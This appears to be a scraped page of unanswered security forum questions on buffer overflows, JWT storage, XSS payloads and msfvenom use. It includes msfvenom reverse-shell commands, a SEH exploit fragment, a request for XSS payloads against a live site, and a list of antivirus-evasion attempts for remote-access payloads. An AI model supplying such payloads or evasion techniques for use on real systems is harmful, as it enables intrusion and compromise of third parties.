BufferOverFlow – How come ESP points to the end of the payload

I just don’t understand how ESP points to the shellcode

let’s say we’ve sent this string

string = 100 * 'A' + 'BBBB' + 'CCCC' 

I have filled the stack with ‘AAAA..’ and overwritten the EIP value and set it to ‘BBBB’ and I got the segmentation fault as expected, what I don’t understand is when debugging the ESP points directly to ‘CCCC’, isn’t the ESP pointing to the top of the stack, and we have already filled the stack with ‘AAAA’, shouldn’t be ESP pointing to these AAAA?

Split a JWT between payload and signature

Context: I’m looking at storage solutions for JWT tokens on a single page application.

  1. Storing the JWT in the local storage is unsafe and prone to XSS attacks.
  2. Storing the JWT in a secure / HTTP only cookie is safer, but prone to CSRF attacks.

I’m studying the following scenario:

Upon authentication, a refresh token is stored in an http only secure cookie. It can only be used to get an access token.

Upon authorisation, the backend responds with a JWT access token. The header and payload part of the JWT are inside the response body. The token signature is not sent and is set in an http only secure cookie (same-site strict if possible, but let’s assume it’s not the case). The header + payload is stored in memory.

When making requests, the header + payload is sent via XHR/fetch by the SPA in an Authorisation header. The signature is sent along with the cookies. The backend concatenates both and verify the signature.

Would such a mechanism be safe from XSS and CRSF attacks, or is it just adding un-necessary complexity ? Since the cookie does not contain the full JWT, this seems like a CSRF attack would not be able to make requests. And an XSS attack would at least (this is a mild protection at this point since an XSS attack is possible, but still), not be able to retrieve the full token.

Note: I’ve read this question which is similar, but overly broad so I’m posting this to get a more precise answer.

XSS payload for XMLHttpRequest()

The source code says as below:

<script>        function doSearch(item) {                           url = 'https://api.mywebsite.com/search'         var xmlHttp = new XMLHttpRequest();         xmlHttp.onreadystatechange = function() {            if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {             response = JSON.parse(xmlHttp.responseText);             populateTable(response);           }           else if (xmlHttp.readyState == 4 && xmlHttp.status != 200) {             console.log(xmlHttp.responseText);           }         }         xmlHttp.open('POST', url, true);          xmlHttp.setRequestHeader('Content-Type', 'application/json; charset=UTF-8');         xmlHttp.setRequestHeader('Accept', 'application/json');         data = {'searchTerm':item}         xmlHttp.send(JSON.stringify(data));                }              var mockResponse = {         "response" :           [             {               "breed" : "german sheperd",               "intelligence" : 3             },             {               "breed" : "labrador retriever",               "intelligence" : 7             }           ]       }              function populateTable(response) {                  document.getElementById('theTable').innerHTML = '';                  responseData = response['response'];                  for (i = 0; i < responseData.length; i++) {           tr = document.createElement('tr');           td1 = document.createElement('td');           td1.setAttribute('class', 'column1');           td1.innerText = responseData[i]['breed'];           tr.appendChild(td1);           td2 = document.createElement('td');           td2.setAttribute('class', 'column2');           td2.innerText = responseData[i]['intelligence'];           tr.appendChild(td2);           document.getElementById('theTable').appendChild(tr);         }                  }        </script> 

Any way I can achieve XSS with a pop up??

msfvenom payload available formats

How can you tell the available output formats for a given payload in msfvenom? For example:

this wont work:

msfvenom -p cmd/unix/reverse_ssh LHOST=[ip] LPORT=4444 -f elf > out.elf 

but this will:

msfvenom -p cmd/unix/reverse_ssh LHOST=[ip] LPORT=4444 -f raw > out.sh 

and –list formats just shows every format in msfvenom

metasploit payload

I’m use the ms f venom to make a payload app for android and i share the app to may another phone with it own network then i install the app but there was no reaction in my listener phone for host i use my listener IP that was in the info of phone what IP i have to use and the payload has to be on – t c p – or HTTP when i use the same network for my phones payload is worked thanks for Ur react .

How to inject a good XSS payload in a vulnerable site

please i need help here. I discovered a shady ponzi site with XSS vulnerability issues. The vulnerability is located in the registration page, all user input field is vulnerable, which consist of – email field, phone number field and password field.

Please guys, what good XSS payload can i use to exploit this vulnerability and how do i go about it.

Thanks alot.

What is this “prepare” variable used for in this SEH based buffer overflow payload?

I am trying to understand how a SEH based buffer overflow is working and I have to write a paper about how an exploit works. I took this PoC for my paper.

junk = "\x41" * 4091  nseh = "\x61\x62" seh  = "\x57\x42"           # Overwrite Seh # 0x00420057 : {pivot 8}  prepare =  "\x44\x6e\x53\x6e\x58\x6e\x05" prepare += "\x14\x11\x6e\x2d\x13\x11\x6e\x50\x6d\xc3" prepare += "\x41" * 107; ... 

I don’t really understand how it’s jumping over the next SEH.

  • What is \x61\x62 used for in the nseh variable?
  • What is the prepare variable used for?
  • How is it jumping to the shellcode?

I already understand that the \x57\x42 is used as a pointer to target a pop pop ret to trigger a second error but I am stuck after that…

Creating a FUD Payload

Hey I’ve been looking into ethical hacking recently and I’ve been really struggling to create a truly FUD payload that evades AV (Windows Defender I’m fine at avoiding.) I’ve tried various options (listed below) and none so far have been successful in creating a meterpreter session.

So I was just wondering if you guys know any less-known techniques that might work for successfully creating a payload and obtaining remote control to test and analyze on systems (I’m assuming delivering payloads and running them on the victim is the only option for remote control, as all remote exploits like EternalBlue and DoublePulsar are patched on modern pcs right)? Also even when I disable AV on the target and run the payload the session doesn’t open so I’m guessing the port isn’t open on the victim (443 I’m trying), so will I have to find a way to open that port in my file or disable firewall completely?

Also just a guess, do you think generating payloads via less used RATs like Cobalt Strike will be more successful?

Thanks!

Methods Tried

-MSFvenom shikata_ga_nai encryption python payload to exe (via pyinstaller and Fern Obfuscator), got 2 hits with this on VirusTotal.com but Norton on the victim still discovered it and running it didn’t connect (Norton labels it as a “heuristic virus.” Tried staged and stageless payloads, as well as HTTPS or reverse_tcp.

-Powershell one-liner command (Norton intercepts and disables)

-Regsvr one-liner command (Again picked up by Norton)

-Custom VBS script compiled to an exe (picked up and unable to connect to attacker even without AV on)

-Phantom and Veil-evasion (both picked up by AV)

-AsyncRat with custom payload (picked up by AV and didn’t work when run)

-Powershell Rat (didn’t work)